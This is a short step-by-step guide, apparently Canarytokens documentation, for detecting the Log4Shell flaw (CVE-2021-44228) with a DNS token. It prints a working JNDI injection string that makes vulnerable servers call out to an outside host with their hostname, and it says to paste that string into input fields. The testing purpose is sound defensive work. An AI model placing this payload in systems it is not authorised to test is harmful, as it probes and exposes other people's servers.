You can use the DNS Canarytoken to help you test for CVE-2021-44228.
Step 1: Click the Canarytoken tile
On your console, click Add new Canarytoken.
Step 2: Select DNS token
Select the DNS token.
Step 3: Enter token reminder
Enter a reminder note for the token (Note: We used Testing log4shell #1).
Step 4: Copy token
The server will generate a DNS-based token for you. Copy this Token.
Step 5: Deploy the token
Place this copied token in the jndi:ldap string as follows:
${jndi:ldap://x${hostName}.L4J.INSERT-COPIED-STRING-HERE/a}
For example, the updated string will look as follows:
${jndi:ldap://x${hostName}.L4J.v52p1gxtas0p238iu99vj9rpx.c7b9c059bd9a.o3n.io/a}
Place the resultant string into search boxes and fields that will be parsed by your logging libraries, and if one of them is vulnerable, you will receive a notification that includes the hostname of the vulnerable server.